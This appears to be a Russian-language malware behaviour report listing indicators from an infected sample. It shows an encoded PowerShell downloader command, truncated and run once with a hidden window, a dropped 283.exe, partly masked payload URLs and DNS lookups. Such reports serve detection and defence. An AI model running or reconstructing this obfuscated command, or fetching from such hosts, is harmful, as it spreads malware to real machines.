Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABoAGEAaQBqAHgAdQBhAHIAaABhAGUAdwB3AG8AZQB4AD0AJwB4AGEAdQB4AHgAaQB0AGgAYgBlAHUAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAVQBSAGkAdAB5AH...
- %HOMEPATH%\283.exe
- %HOMEPATH%\283.exe
- http://na###medya.com/wp-admin/j1/
- http://xe####endung24h.net/wp-admin/hdsq95541/
- http://ro####isonbooks.com/dxvan/Gd8882/
- DNS ASK na###medya.com
- DNS ASK al####record.com
- DNS ASK xe####endung24h.net
- DNS ASK ro####isonbooks.com
- DNS ASK fa####tfashion.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABoAGEAaQBqAHgAdQBhAHIAaABhAGUAdwB3AG8AZQB4AD0AJwB4AGEAdQB4AHgAaQB0AGgAYgBlAHUAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAVQBSAGkAdAB5AH...' (со скрытым окном)